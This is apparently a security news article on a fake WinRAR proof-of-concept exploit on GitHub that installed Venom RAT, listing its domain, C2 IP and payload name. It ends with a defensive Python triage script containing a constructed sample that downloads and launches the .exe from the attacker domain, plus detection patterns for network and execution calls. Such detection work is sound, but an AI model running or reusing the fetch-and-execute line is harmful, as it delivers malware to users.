A malicious actor executed a rather unconventional strategy by releasing a counterfeit proof-of-concept (PoC) exploit for a newly unveiled WinRAR vulnerability on the popular code-sharing platform GitHub.
The intent behind this peculiar maneuver was to compromise unsuspecting users who downloaded the deceptive code, introducing them to the Venom RAT malware.
Notably, this faux PoC leveraged a publicly available script, initially designed to exploit a SQL injection vulnerability found in a software application known as GeoServer, under the designation CVE-2023-25157.
Palo Alto Networks’ Analysis
Palo Alto Networks Unit 42 researcher, Robert Falcone, shed light on this unorthodox approach, emphasizing the actor’s deceptive tactics.
Fraudulent PoCs aimed at the research community are not uncommon, but analysts noted an opportunistic twist in this case: the apparent targets are other malicious actors looking to add the latest vulnerabilities to their toolkits.
The GitHub repository, under the handle “whalersplonk,” which hosted this deceptive PoC, has since been rendered inaccessible. It is worth noting that the PoC was added to the repository on August 21, 2023, a mere four days after the vulnerability’s public disclosure.
The CVE-2023-40477 Vulnerability
The vulnerability in question, CVE-2023-40477, is a validation flaw in the WinRAR utility that could lead to remote code execution (RCE) on Windows systems. The maintainers fixed it in WinRAR 6.23, alongside another, actively exploited flaw tracked as CVE-2023-38831.
Further analysis of the repository uncovered a Python script and a Streamable video, both presented as instructions for using the exploit. The video garnered 121 views in total.
Rather than running any exploit, the Python script contacts a remote server at “checkblacklistwords[.]eu” and fetches an executable named “Windows.Gaming.Preview.exe,” identified as a variant of the Venom RAT.
This malicious payload equips threat actors with the ability to enumerate running processes and receive commands from a server under their control, residing at IP address 94.156.253[.]109.
An in-depth examination of the attack infrastructure revealed a noteworthy detail: the threat actor had registered the “checkblacklistwords[.]eu” domain at least ten days prior to the public disclosure of the vulnerability. This indicates a calculated move on the actor’s part, capitalizing swiftly on the newfound criticality of the security flaw to attract potential victims.
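The behaviour described above (a “PoC” that fetches and launches a remote binary instead of building a crafted archive) has a recognisable static shape. The following is an added example, not Unit 42’s code and not the contents of the removed repository: a read-only triage helper that inspects a downloaded script’s text for downloader patterns and for the indicators reported in this article. The regex heuristics are assumptions of the example, and both sample scripts are constructed here; the fake one keeps the indicators in defanged form so it resolves nothing.

```python
import re
from dataclasses import dataclass

# Indicators reported in the article, kept in their published defanged form.
KNOWN_IOCS = {
    "domain": "checkblacklistwords[.]eu",
    "c2_ip": "94.156.253[.]109",
    "payload": "Windows.Gaming.Preview.exe",
}

# Heuristics (assumed for this example): a genuine PoC for an archive-parsing bug
# builds a crafted file locally; it has no reason to fetch a binary and launch it.
FETCH_PATTERNS = [
    r"\burllib\.request\b", r"\brequests\.(get|post)\b", r"\bsocket\.connect\b",
    r"\bwget\b", r"\bcurl\b", r"\bInvoke-WebRequest\b",
]
EXEC_PATTERNS = [
    r"\bos\.startfile\b", r"\bos\.system\b", r"\bsubprocess\.(Popen|run|call)\b",
    r"\bctypes\.windll\b", r"\bos\.exec[lv]p?e?\b",
]
# Any string literal naming a Windows executable or library.
BINARY_LITERAL = r"""['"][^'"\n]*\.(?:exe|dll|scr)['"]"""


def refang(value: str) -> str:
    """Turn a defanged indicator ("a[.]b", "hxxp") back into its matchable form."""
    return value.replace("[.]", ".").replace("hxxp", "http")


@dataclass
class TriageResult:
    ioc_hits: list
    fetch_hits: list
    exec_hits: list
    binary_refs: list

    @property
    def verdict(self) -> str:
        if self.ioc_hits:
            return "known-ioc-match"
        if self.fetch_hits and self.exec_hits:
            return "downloader-behaviour"
        if self.fetch_hits or self.exec_hits or self.binary_refs:
            return "needs-review"
        return "no-network-or-execution-indicators"


def triage_script(source: str) -> TriageResult:
    """Static checks only: the script text is read, never imported or executed."""
    normalised = refang(source).lower()
    ioc_hits = [name for name, ioc in KNOWN_IOCS.items()
                if refang(ioc).lower() in normalised]
    fetch_hits = [p for p in FETCH_PATTERNS if re.search(p, source)]
    exec_hits = [p for p in EXEC_PATTERNS if re.search(p, source)]
    binary_refs = re.findall(BINARY_LITERAL, source)
    return TriageResult(ioc_hits, fetch_hits, exec_hits, binary_refs)


# Constructed sample modelled on the article's description of the fake PoC.
# The domain is left defanged, so this text does not point at a live host.
SAMPLE_FAKE_POC = '''
import urllib.request, os
url = "http://checkblacklistwords[.]eu/Windows.Gaming.Preview.exe"
urllib.request.urlretrieve(url, "Windows.Gaming.Preview.exe")
os.startfile("Windows.Gaming.Preview.exe")
'''

# Constructed sample of the shape a real archive-parser PoC takes: writes a
# local test file and touches no network.
SAMPLE_BENIGN_POC = '''
import struct
with open("poc.rar", "wb") as fh:
    fh.write(b"Rar!" + struct.pack("<I", 0))
'''

if __name__ == "__main__":
    for label, text in (("fake", SAMPLE_FAKE_POC), ("benign", SAMPLE_BENIGN_POC)):
        result = triage_script(text)
        print(f"{label}: {result.verdict} iocs={result.ioc_hits} "
              f"fetch={len(result.fetch_hits)} exec={len(result.exec_hits)}")
```

The check is deliberately static: the point of the article is that the payload runs the moment someone executes the script, so triage has to happen on the text before anything is run. Indicator matching catches this specific campaign; the downloader-shape heuristic is what generalises to the next fake PoC with a fresh domain.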